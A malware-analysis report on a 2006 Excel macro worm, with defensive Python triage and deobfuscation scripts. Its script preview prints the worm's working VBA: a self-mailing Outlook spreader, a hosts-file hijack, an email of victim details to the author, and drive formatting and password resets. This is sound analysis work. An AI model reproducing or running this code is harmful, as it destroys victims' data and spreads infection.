Verdict: MALICIOUS
Risk score: 570
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
T1112 Modify Registry
T1485 Data Destruction
T1531 Account Access Removal
The sample is an Excel workbook (sheets Tabelle1 to Tabelle3, the German Excel defaults) whose Workbook_Open macro in module SkorCzybikFSE runs as soon as macros are enabled; the sheet text lures the user into enabling macros to view account data, and the macro's own header describes it as the 2006 "Skor Czybik File System Eraser" worm by sk0r. Everything runs under On Error Resume Next, so a failed step (no Outlook profile, no removable drive) does not stop the rest.

Using WScript.Shell and Scripting.FileSystemObject the macro copies the workbook to the Windows directory as Ihre_Angaben<random>.xls ("Your details"), sets HKCU\...\Policies\System\DisableTaskMgr to 1 and the Windows Scripting Host Timeout to 0, then writes and runs sk0r_mailer.vbs. That script's text is assembled from Chr() sequences and from strings padded with "!" that Replace() strips; decoded, it drives Outlook to send the copied workbook as an attachment to the first 27 entries of the default address book under German lure subjects such as "Ihre Rechnung T-Com" ("Your T-Com invoice") and "Deine Zugangsdaten" ("Your login details"). The macro then overwrites %SystemRoot%\system32\drivers\etc\hosts so that antivirus, Windows Update, search, mail and news sites resolve to 127.0.0.1 (the address is itself built from Chr() calls), deletes the protocol and services files next to it, and emails the victim's user and computer name to sk0r1337@gmx.de through Outlook ("Hello sk0r, I am an infected user of your worm Win32/SkorCzybikFSE.A").

The destructive part follows: it sets HideFileExt, RegisteredOrganization, RegisteredOwner and the Internet Explorer window title; deletes every .url file in Favorites and drops four shortcuts to www.speedsurf.to/sk0r1337/; writes and runs a second script (sk0r_Overwrt.vbs) that deletes every file in My Pictures and its subfolders; runs format <drive> /y against every removable and fixed drive (FileSystemObject DriveType 1 and 2); strips the attributes from boot.ini and deletes boot.ini, win.ini and system.ini; changes the Administrator and current-user passwords to a random number with net user; drops and runs sk0r_Batch.bat, which prints an infection notice; and finally opens http://aeq.ae.funpic.de/Czybik_sk0r_Flagge.jpg with the default handler, sets the Explorer Hidden value, marks the workbook hidden and calls RUNDLL32 user32.dll,UpdatePerUserSystemParameters to apply the settings. The URL is the sample's only network indicator and is opened, not fetched as a payload; nothing in the visible source downloads or executes a second stage. The self-mailing plus the wiper steps make this a worm with a destructive payload rather than a downloader.
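The changes above leave concrete traces on an affected host. The following added example, which is not part of this report or of the sample, implements two of the checks a responder would run: it parses a hosts file for names sunk to a loopback address and a `reg export` dump for the values the macro's regwrite calls set. The hosts text and the .reg text in the block are constructed to resemble the macro's output; the value paths are the ones in the extracted script, with HKCU spelled out as HKEY_CURRENT_USER.

```python
"""Host triage for the changes this macro makes: hosts-file entries that sink security and
update sites to loopback, and the registry values its regwrite calls set. Added example, not
report or sample code; the hosts and 'reg export' texts below are constructed, not captured."""
import ipaddress
import re

LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}
# Value paths and data taken from the regwrite calls in the extracted macro (HKCU spelled out).
MACRO_REG_WRITES = {
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr": "1",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout": "0",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt": "1",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden": "1",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner": "sk0r",
    r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title": "Skor Czybik File System Erase",
}


def audit_hosts(text):
    """Return hostnames that a hosts file maps to a loopback address, excluding the normal ones."""
    findings = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()     # drop comments, then tokenise
        if not fields:
            continue
        try:
            if not ipaddress.ip_address(fields[0]).is_loopback:
                continue
        except ValueError:
            continue                               # not an address: leave it to other checks
        findings += [n for n in fields[1:] if n.lower() not in LOOPBACK_NAMES]
    return findings


def parse_reg_export(text):
    """Parse 'reg export' (.reg) text into {key\\value: data}; REG_DWORD becomes a decimal string."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and (m := re.match(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$', line)):
            name, dword, string = m.groups()       # string data is kept as written (no unescaping)
            values[f"{key}\\{name}"] = str(int(dword, 16)) if dword is not None else string
    return values


def audit_registry(text):
    """Return (value path, data) pairs in a .reg export that match what the macro writes."""
    return [(p, d) for p, d in parse_reg_export(text).items() if MACRO_REG_WRITES.get(p) == d]


# Constructed samples in the shape the macro produces (hosts file) and 'reg export' prints.
HOSTS_SAMPLE = """# access to dl,av or search sites usw denied
127.0.0.1 localhost
127.0.0.1 www.virustotal.com
127.0.0.1 www.windowsupdate.com
::1 ip6-localhost
"""
REG_SAMPLE = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"HideFileExt"=dword:00000001
"Hidden"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
"RegisteredOwner"="sk0r"
"""
```

Real .reg exports are UTF-16 with a byte-order mark, so read them with encoding="utf-16" before passing the text in. String data is compared as written (a .reg file escapes backslashes and quotes), which is sufficient for the literals this macro writes; the Hidden=2 entry in the sample is the normal Explorer default and is correctly left out of the findings.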
Heuristics (14)

- ClamAV: Xls.Trojan.Skorbik-1 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Xls.Trojan.Skorbik-1.
- VBA macros detected (medium, OLE_VBA_MACROS, 8 related findings). The document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script:
  favfolder = wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\" & "Favorites")
  Caveat: this match is the registry path "Shell Folders", not a Shell() call. The process launches in this macro are the wshs.Run calls further down (the dropped mailer and file-deletion scripts, format, net user, the dropped batch file, RUNDLL32 and the final URL).
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched lines in script:
  On Error Resume Next
  Set wshs = CreateObject("wscript.shell")
  Set fso = CreateObject("scripting.filesystemobject")
- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN). Matched lines in script:
  getmyslf.Attributes = getmyslf.Attributes + 2
  wshs.Run ("RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters")
  Here RUNDLL32 only reloads the per-user settings after the registry and attribute changes; it does not run a payload.
- Obfuscated VBA Shell command with URL (critical, OLE_VBA_OBFUSCATED_SHELL_URL). The VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. The rule treats this as a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched lines in script:
  On Error Resume Next
  Set wshs = CreateObject("wscript.shell")
  Set fso = CreateObject("scripting.filesystemobject")
  Caveat for this sample: the only URL reaches wshs.Run by itself (wshs.Run ("http://aeq.ae.funpic.de/Czybik_sk0r_Flagge.jpg")), which opens it with the default handler; the visible source contains no download-and-execute step, so the downloader reading of this rule does not apply here.
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER). Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the decoder is Chr() concatenation (the ilikeskor lines) plus Replace(x, "!", "") junk-token removal (kackfun1, kackfun2), and the decoded text is the Outlook mailer written to sk0r_mailer.vbs; CreateObject and wshs.Run themselves still appear in clear text. Matched lines in script: the same three lines as above.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script: the same three lines as above.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample the p-code disassembly appended to the script preview has the same literals and call sequence as the decompressed source (same registry paths, same Chr() values, same 1000000 and 1246487 constants), which argues against VBA stomping; the identifier names it resolves are shifted at several points (for example Ld AllDrives where the source reads Rnd, Set ilikeskor where it reads Set CreateEmailApplication), which is consistent with a name-resolution artifact of the disassembler rather than with different code.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched lines in script:
  Private Sub Workbook_Open()
  On Error Resume Next
- Reference to Windows Script Host (high, SC_STR_WSCRIPT).
- LOLBin token sequence in document text (high, SE_LOLBIN_RUN_COMMAND). Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. This is a visible "run this" instruction in HTML/PDF/RTF lure bodies, or, in macro-laden Office files, the macro's own string-pool entries appearing adjacent in extracted text.
- Macro/content-enable lure (medium, SE_ENABLE_LURE). The document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://aeq.ae.funpic.de/Czybik_sk0r_Flagge.jpg (referenced by macro; passed to wshs.Run at the end of Workbook_Open)
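The two obfuscation findings above describe how the dropped mailer is assembled: Chr() sequences joined with + and &, and strings padded with "!" that Replace() strips. Recovering the result does not require running the macro. The following added example (not code from the report or the sample) statically evaluates that subset of VBA: it walks Workbook_Open source lines such as those in the extracted-script preview, follows assignments and createtextfile/write/writeline calls, and returns the reconstructed file contents together with the Shell.Run command lines. Values that only exist at run time (sysdir, intZahl, FormatDrive) are left as <name> placeholders rather than guessed; the SAMPLE lines are an excerpt copied from the preview.

```python
"""Static emulator for the VBA subset this dropper uses to build its payload files (Chr()
concatenation, '+'/'&' joins, vbCrLf, Replace() junk-token removal, write/writeline into
createtextfile handles) and to log its Shell.Run commands. Added example, not report or sample code."""
import re

TOKEN = re.compile(r'\s+|"(?:[^"]|"")*"|\d+|[A-Za-z_][\w.]*|[()+&,]')
ASSIGN = re.compile(r"^(\w+)\s*=\s*(.+)$")
NEWFILE = re.compile(r"^Set\s+(\w+)\s*=\s*\w+\.createtextfile\s*\((.+)\)$", re.I)
WRITE = re.compile(r"^(\w+)\.(writeline|write)\s*\((.*)\)$", re.I)
RUN = re.compile(r"^\w+\.Run\s*\((.+?)\)", re.I)
BUILTINS = {"vbcrlf": "\r\n", "true": True, "false": False}

def tokenize(text):
    """Split a VBA expression into literals, numbers, names and punctuation; reject anything else."""
    if leftover := TOKEN.sub("", text):
        raise ValueError(f"unsupported syntax: {leftover!r}")
    return [t for t in TOKEN.findall(text) if not t.isspace()]

class Evaluator:
    """Recursive-descent evaluator for comma-separated VBA string expressions."""

    def __init__(self):
        self.vars = {}                             # variables assigned so far, lower-cased names

    def evaluate(self, text):
        self.toks, self.i = tokenize(text), 0
        values = [self.expr()]
        while self.take(","):
            values.append(self.expr())
        if self.i != len(self.toks):
            raise ValueError("trailing tokens")
        return values

    def take(self, tok):
        hit = self.i < len(self.toks) and self.toks[self.i] == tok
        self.i += hit                              # consume the token when it matches
        return hit

    def expr(self):
        value = self.term()
        while self.take("+") or self.take("&"):    # both join strings here, so precedence is moot
            value = str(value) + str(self.term())
        return value

    def term(self):
        tok = self.toks[self.i] if self.i < len(self.toks) else ")"
        if tok in ")+&,":
            raise ValueError("malformed expression")
        self.i += 1
        if tok.startswith('"'):
            return tok[1:-1].replace('""', '"')    # VBA doubles a quote to embed it
        if tok.isdigit():
            return int(tok)
        if tok == "(" or self.take("("):           # parenthesised expression or function call
            args = [self.expr()]                   # zero-argument calls are not modelled
            while self.take(","):
                args.append(self.expr())
            if not self.take(")"):
                raise ValueError("missing )")
            return args[0] if tok == "(" else self.call(tok, args)
        return BUILTINS.get(tok.lower(), self.vars.get(tok.lower(), f"<{tok}>"))  # unknown: keep symbolic

    def call(self, name, args):
        fn = name.lower()
        if fn in ("chr", "cstr"):
            return chr(args[0]) if fn == "chr" else str(args[0])
        if fn == "replace":                        # Replace(text, find, replacement)
            return str(args[0]).replace(str(args[1]), str(args[2]))
        raise ValueError(f"unsupported function {name}")

def emulate(macro_lines):
    """Return ({path: content}, [Shell.Run commands]) reconstructed from macro source lines."""
    ev, handles, files, runs = Evaluator(), {}, {}, []
    for raw in macro_lines:
        line = raw.strip()
        try:
            if m := NEWFILE.match(line):
                handles[m.group(1).lower()] = path = str(ev.evaluate(m.group(2))[0])
                files[path] = ""
            elif (m := WRITE.match(line)) and m.group(1).lower() in handles:
                eol = "\r\n" if m.group(2).lower() == "writeline" else ""
                files[handles[m.group(1).lower()]] += str(ev.evaluate(m.group(3))[0]) + eol
            elif m := RUN.match(line):
                runs.append(str(ev.evaluate(m.group(1))[0]))
            elif m := ASSIGN.match(line):
                ev.vars[m.group(1).lower()] = ev.evaluate(m.group(2))[0]
        except (ValueError, TypeError, IndexError):
            pass                                   # statement outside the modelled subset: skip it
    return files, runs

# Constructed excerpt of the Workbook_Open macro shown in the extracted-script preview.
SAMPLE = r'''
Set CreateEmailApplication = fso.createtextfile(sysdir + "\sk0r_mailer.vbs", True)
ilikeskor = Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(79) & Chr(85) & Chr(84) & Chr(65) & Chr(80) & Chr(80)
ilikeskor = ilikeskor + Chr(32) & Chr(61) & Chr(67) & Chr(82) & Chr(69)
CreateEmailApplication.write (ilikeskor)
CreateEmailApplication.writeline (vbCrLf + "thebodymail = ""Dear User"" + vbCrLf ")
kackfun1 = "!!!!Ne!!!wE!!!!!Ma!!!!i!!!l!!!.!!!T!!!!o !!!=!! a!!!!!r!!!g!!!h "
kackfun1 = Replace(kackfun1, "!", "")
CreateEmailApplication.writeline (kackfun1)
wshs.Run ("WScript " + sysdir + "\sk0r_mailer.vbs"), , True
'''.strip().splitlines()
```

Fed the whole Workbook_Open body from the preview, emulate() reconstructs sk0r_mailer.vbs (its first decoded lines read SET OUTAPP =CREATEOBJECT ("OUTLOOK.APPLICATION") and FOR S_MAILS = 1 TO 27), the hosts file with 127.0.0.1 resolved from its Chr() calls, the four .url shortcuts, sk0r_Overwrt.vbs and sk0r_Batch.bat, and lists the format, net user, WScript, batch and RUNDLL32 launches. Statements outside the modelled subset (registry writes, COM method calls, arithmetic) are skipped, so anything that depends on them appears as a placeholder instead of an invented value.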
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65675 bytes | 9a78d49324de7cfd061af4a7db7175c80903758267ada9a05961bf432f5361f7 |

Script preview: first 1,000 lines of the extracted script. The artifact holds the decompressed VBA source of all four modules followed by a p-code disassembly of the SkorCzybikFSE module stream; the preview is cut off inside the disassembly.
Attribute VB_Name = "SkorCzybikFSE"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Macro/SkorCzybikFSE.A ©opyrights 2006 by sk0r
'This Worm was created by sk0r aka Daniel B.
'You are not allowed to decompile the Worm!
'ViSiT my Site @ www.sk0r-virii.tk
'
' This is a very dangerous worm, because it's formating
' all found drives and discettes which are inserted.
' Also it deletes important System files like boot.ini,
' system.ini and win.ini. it has much functions more like
' you can see here ;-)
'
' WARNING: This worm makes the system unuseable and
' erase all files of harddrives and discettes!!
'
' The Wormname means:
'
' Skor Czybik File System Eraser
'
'========================================================
Private Sub Workbook_Open()
On Error Resume Next
Set wshs = CreateObject("wscript.shell")
Set fso = CreateObject("scripting.filesystemobject")
Set sysdir = fso.getspecialfolder(1)
Set windir = fso.getspecialfolder(0)
hddisk = Left(windir, 2)
Set ntwrk = CreateObject("wscript.network")
Randomize: intZahl = Int(1000000 * Rnd) + 1246487
Set getmenow = fso.getfile(SkorCzybikFSE.Path + "\" + SkorCzybikFSE.Name)
getmenow.Copy (windir + "\Ihre_Angaben" + CStr(intZahl) + ".xls")
wshs.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
Set CreateEmailApplication = fso.createtextfile(sysdir + "\sk0r_mailer.vbs", True)
CreateEmailApplication.writeline ("rem Win32/SkorCzybikFSE Mailer Script File ")
CreateEmailApplication.writeline ("On Error Resume Next ")
CreateEmailApplication.writeline ("Set fso = CreateObject(""scripting.filesystemobject"") ")
CreateEmailApplication.writeline ("Set sysdir = fso.getspecialfolder(1) ")
CreateEmailApplication.writeline ("Set windir = fso.getspecialfolder(0) ")
ilikeskor = Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(79) & Chr(85) & Chr(84) & Chr(65) & Chr(80) & Chr(80)
ilikeskor = ilikeskor + Chr(32) & Chr(61) & Chr(67) & Chr(82) & Chr(69)
ilikeskor = ilikeskor + Chr(65) & Chr(84) & Chr(69) & Chr(79) & Chr(66) & Chr(74) & Chr(69) & Chr(67)
ilikeskor = ilikeskor + Chr(84) & Chr(32) & Chr(40) & Chr(34) & Chr(79) & Chr(85)
ilikeskor = ilikeskor + Chr(84) & Chr(76) & Chr(79) & Chr(79) & Chr(75) & Chr(46) & Chr(65) & Chr(80)
ilikeskor = ilikeskor + Chr(80) & Chr(76) & Chr(73) & Chr(67) & Chr(65)
ilikeskor = ilikeskor + Chr(84) & Chr(73) & Chr(79) & Chr(78) & Chr(34) & Chr(41) & vbCrLf & Chr(83) & Chr(69)
ilikeskor = ilikeskor + Chr(84) & Chr(32) & Chr(78) & Chr(69) & Chr(87) & Chr(69) & Chr(77) & Chr(65) & Chr(73) & Chr(76) & Chr(61)
ilikeskor = ilikeskor + Chr(79) & Chr(85) & Chr(84)
ilikeskor = ilikeskor + Chr(65) & Chr(80) & Chr(80) & Chr(46) & Chr(67) & Chr(82) & Chr(69) & Chr(65)
ilikeskor = ilikeskor + Chr(84) & Chr(69) & Chr(73) & Chr(84) & Chr(69) & Chr(77) & Chr(40) & Chr(48) & Chr(41) & vbCrLf & Chr(70)
ilikeskor = ilikeskor + Chr(79) & Chr(82) & Chr(32) & Chr(83) & Chr(95)
ilikeskor = ilikeskor + Chr(77) & Chr(65) & Chr(73) & Chr(76) & Chr(83) & Chr(32) & Chr(61) & Chr(32)
ilikeskor = ilikeskor + Chr(49) & Chr(32) & Chr(84) & Chr(79) & Chr(32) & Chr(50) & Chr(55) + vbCrLf
ilikeskor = ilikeskor + Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(77) & Chr(85) & Chr(72) & Chr(65)
ilikeskor = ilikeskor + Chr(32) & Chr(61) & Chr(32) & Chr(79) & Chr(85)
ilikeskor = ilikeskor + Chr(84) & Chr(65) & Chr(80) & Chr(80) & Chr(46) & Chr(71) & Chr(69) & Chr(84)
ilikeskor = ilikeskor + Chr(78) & Chr(65) & Chr(77) & Chr(69) & Chr(83)
ilikeskor = ilikeskor + Chr(80) & Chr(65) & Chr(67) & Chr(69) & Chr(40) & Chr(34) & Chr(77) & Chr(65)
ilikeskor = ilikeskor + Chr(80) & Chr(73) & Chr(34) & Chr(41) + vbCrLf
ilikeskor = ilikeskor + Chr(83) & Chr(69) & Chr(84) & Chr(32) & Chr(65) & Chr(82) & Chr(71) & Chr(72)
ilikeskor = ilikeskor + Chr(61) & Chr(32) & Chr(77) & Chr(85) & Chr(72) & Chr(65) & Chr(46) & Chr(65) & Chr(68) & Chr(68)
ilikeskor = ilikeskor + Chr(82) & Chr(69) & Chr(83) & Chr(83) & Chr(76) & Chr(73) & Chr(83) & Chr(84)
ilikeskor = ilikeskor + Chr(83) & Chr(40) & Chr(49) & Chr(41)
ilikeskor = ilikeskor + Chr(46) & Chr(65) & Chr(68) & Chr(68) & Chr(82) & Chr(69) & Chr(83) & Chr(83)
ilikeskor = ilikeskor + Chr(69) & Chr(78) & Chr(84) & Chr(82) & Chr(73) & Chr(69) & Chr(83)
ilikeskor = ilikeskor + Chr(40) & Chr(83) & Chr(95) & Chr(77) & Chr(65) & Chr(73) & Chr(76) & Chr(83)
ilikeskor = ilikeskor + Chr(41)
CreateEmailApplication.write (ilikeskor)
CreateEmailApplication.writeline (vbCrLf + "thebodymail = ""Dear User"" + vbCrLf ")
CreateEmailApplication.writeline ("thebodymail = thebodymail + "" "" +vbcrlf ")
CreateEmailApplication.writeline ("thebodymail = thebodymail + "" Your Account has been activated "" +vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""To get your username and password ""+vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""please read the attached document ""+vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""then you can login immediately "" +vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + "" "" +vbcrlf")
CreateEmailApplication.writeline ("thebodymail = thebodymail + ""Best Regards"" +vbcrlf")
CreateEmailApplication.writeline ("Randomize ")
CreateEmailApplication.writeline ("emailcounter = Int(4 * Rnd) ")
CreateEmailApplication.writeline ("If emailcounter = 1 Then ")
CreateEmailApplication.writeline ("thesubjectmail = ""Your Password"" ")
CreateEmailApplication.writeline ("ElseIf emailcounter = 2 Then ")
CreateEmailApplication.writeline ("thesubjectmail = ""Ihre Rechnung T-Com ""+Date() ")
CreateEmailApplication.writeline ("ElseIf emailcounter = 3 Then ")
CreateEmailApplication.writeline ("thesubjectmail = ""Deine Zugangsdaten ""+Date ")
CreateEmailApplication.writeline ("Else ")
CreateEmailApplication.writeline ("thesubjectmail = ""Rechnung 2006 Spring"" ")
CreateEmailApplication.writeline ("End If ")
CreateEmailApplication.writeline ("sendingfile = windir + ""\Ihre_Angaben" + CStr(intZahl) + ".xls"" ")
kackfun1 = "!!!!Ne!!!wE!!!!!Ma!!!!i!!!l!!!.!!!T!!!!o !!!=!! a!!!!!r!!!g!!!h "
kackfun1 = Replace(kackfun1, "!", "")
CreateEmailApplication.writeline (kackfun1)
CreateEmailApplication.writeline ("NewEMail.Subject = thesubjectmail ")
CreateEmailApplication.writeline ("NewEMail.Body = thebodymail ")
kackfun2 = "N!!!e!!!!wE!!!M!!!ail!!!.!!!Att!!!!achme!!!!nts!!!.!!!A!!!dd !!!!se!!!n!!!ding!!!!f!!!i!!!le "
kackfun2 = Replace(kackfun2, "!", "")
CreateEmailApplication.writeline (kackfun2)
CreateEmailApplication.writeline ("NewEMail.Send ")
CreateEmailApplication.writeline ("Next ")
CreateEmailApplication.Close
wshs.Run ("WScript " + sysdir + "\sk0r_mailer.vbs"), , True
fso.deletefile (sysdir + "\sk0r_mailer.vbs")
localhostip = Chr(49) & Chr(50) & Chr(55) & Chr(46) & Chr(48) & Chr(46) & Chr(48) & Chr(46) & Chr(49)
Set hostfile = fso.createtextfile(sysdir + "\drivers\etc\hosts", True)
hostfile.writeline ("# Win32/SkorCzybikFSE ©opyright by sk0r")
hostfile.writeline ("# access to dl,av or search sites usw denied")
hostfile.writeline (" ")
hostfile.writeline (localhostip + " www.antivir.de")
hostfile.writeline (localhostip + " www.bitdefender.de ")
hostfile.writeline (localhostip + " www.znet.de")
hostfile.writeline (localhostip + " www.chip.de")
hostfile.writeline (localhostip + " www.virustotal.com")
hostfile.writeline (localhostip + " virusscan.jotti.org")
hostfile.writeline (localhostip + " www.kaspersky.com")
hostfile.writeline (localhostip + " www.sophos.de")
hostfile.writeline (localhostip + " www.trojaner-info.de ")
hostfile.writeline (localhostip + " www.trojaner-help.de ")
hostfile.writeline (localhostip + " www.arcabit.com ")
hostfile.writeline (localhostip + " www.avast.com ")
hostfile.writeline (localhostip + " www.grisoft.com ")
hostfile.writeline (localhostip + " www.bitdefender.com ")
hostfile.writeline (localhostip + " www.clamav.net ")
hostfile.writeline (localhostip + " www.drweb.com ")
hostfile.writeline (localhostip + " www.f-prot.com ")
hostfile.writeline (localhostip + " www.google.de ")
hostfile.writeline (localhostip + " www.fortinet.com")
hostfile.writeline (localhostip + " www.nod32.com ")
hostfile.writeline (localhostip + " www.norman.com ")
hostfile.writeline (localhostip + " www.microsoft.com")
hostfile.writeline (localhostip + " www.anti-virus.by/en")
hostfile.writeline (localhostip + " www.symantec.com ")
hostfile.writeline (localhostip + " www.windowsupdate.com ")
hostfile.writeline (localhostip + " www.trendmicro.com ")
hostfile.writeline (localhostip + " www.mcafee.com ")
hostfile.writeline (localhostip + " www.viruslist.com")
hostfile.writeline (localhostip + " www.avp.com ")
hostfile.writeline (localhostip + " www.zonelabs.com")
hostfile.writeline (localhostip + " www.heise.de ")
hostfile.writeline (localhostip + " www.antivirus-online.de")
hostfile.writeline (localhostip + " www.free-av.com ")
hostfile.writeline (localhostip + " www.panda-software.com")
hostfile.writeline (localhostip + " www.pc-welt.de ")
hostfile.writeline (localhostip + " www.pc-special.net")
hostfile.writeline (localhostip + " download.freenet.de ")
hostfile.writeline (localhostip + " www.vollversion.de ")
hostfile.writeline (localhostip + " www.das-download-archiv.de")
hostfile.writeline (localhostip + " www.freeware.de ")
hostfile.writeline (localhostip + " www.antiviruslab.com")
hostfile.writeline (localhostip + " www.search.yahoo.com")
hostfile.writeline (localhostip + " www.web.de ")
hostfile.writeline (localhostip + " www.hotmail.com")
hostfile.writeline (localhostip + " www.hotmail.de")
hostfile.writeline (localhostip + " www.gmx.net")
hostfile.writeline (localhostip + " www.esl-europe.net")
hostfile.writeline (localhostip + " www.cs-expert.de")
hostfile.writeline (localhostip + " www.spiegel.de")
hostfile.writeline (localhostip + " www.icq.com")
hostfile.writeline (localhostip + " www.icq.de ")
hostfile.writeline (localhostip + " www.og-cheats.de")
hostfile.writeline (localhostip + " www.flirtlife.de")
hostfile.writeline (localhostip + " www.ffh.de")
hostfile.writeline (localhostip + " www.counter-strike.de")
hostfile.writeline (localhostip + " www.counter-strike.net")
hostfile.writeline (localhostip + " www.counterstrike.de")
hostfile.writeline (localhostip + " www.csconfigs.de")
hostfile.writeline (localhostip + " www.netsettings.net")
hostfile.writeline (localhostip + " www.leaguez.com")
hostfile.writeline (localhostip + " www.unrealtournament.com")
hostfile.writeline (localhostip + " www.halflife.yusho.de")
hostfile.writeline (localhostip + " www.planethalflife.com")
hostfile.writeline (localhostip + " www.lavasoft.de")
hostfile.writeline (localhostip + " www.de.wikipedia.org")
hostfile.writeline (localhostip + " www.wikipedia.org")
hostfile.writeline (localhostip + " www.en.wikipedia.org")
hostfile.writeline (localhostip + " www.wissen.de")
hostfile.writeline (localhostip + " www.virus-aktuell.de")
hostfile.writeline (localhostip + " www.arcor.de")
hostfile.writeline (localhostip + " www.t-online.de")
hostfile.writeline (localhostip + " www.t-com.de")
hostfile.writeline (localhostip + " www.counter-hacks.de")
hostfile.writeline (localhostip + " www.alice-dsl.de")
hostfile.writeline (localhostip + " www.freenet.de")
hostfile.writeline (localhostip + " www.1und1.de")
hostfile.writeline (localhostip + " www.fbi.gov")
hostfile.writeline (localhostip + " www.polizei.de")
hostfile.Close
fso.deletefile (sysdir + "\drivers\etc\protocol")
fso.deletefile (sysdir + "\drivers\etc\services")
Set outlookobj = CreateObject("Outlook.Application")
If outlookobj Is Not Nothing Then
sendTxt = "Hallo sk0r," + vbCrLf
sendTxt = sendTxt + " " + vbCrLf
sendTxt = sendTxt + "Ich bin ein infizierter User von deinem" + vbCrLf
sendTxt = sendTxt + "Wurm Win32/SkorCzybikFSE.A ! Diese Nachricht" + vbCrLf
sendTxt = sendTxt + "wurde automatisch erstellt :>" + vbCrLf
sendTxt = sendTxt + " " + vbCrLf
sendTxt = sendTxt + "Mein Username: " + ntwrk.UserName + vbCrLf
sendTxt = sendTxt + "Mein Computername: " + ntwrk.computername + vbCrLf
Set crtNewMail = outlookobj.createitem(0)
crtNewMail.to = "sk0r1337@gmx.de"
crtNewMail.Subject = "Information zu " + ntwrk.computername
crtNewMail.body = sendTxt
crtNewMail.send
End If
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Skor Czybik File Sys Erase"
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Skor Czybik File System Erase"
wshs.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "sk0r"
favfolder = wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\" & "Favorites")
Set getfav = fso.getfolder(favfolder)
favfiles = getfav.Files
For Each dateifile In favfiles
favext = LCase(fso.getextensionname(dateifile.Path))
If favext = "url" Then
fso.deletefile (dateifile.Path)
End If
Next
Set urlwrite = fso.createtextfile(favfolder + "\warez.url")
urlwrite.writeline ("[DEFAULT] ")
urlwrite.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup1.html ")
urlwrite.writeline ("[InternetShortcut] ")
urlwrite.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup1.html ")
urlwrite.Close
Set urlwrite2 = fso.createtextfile(favfolder + "\h4x.url")
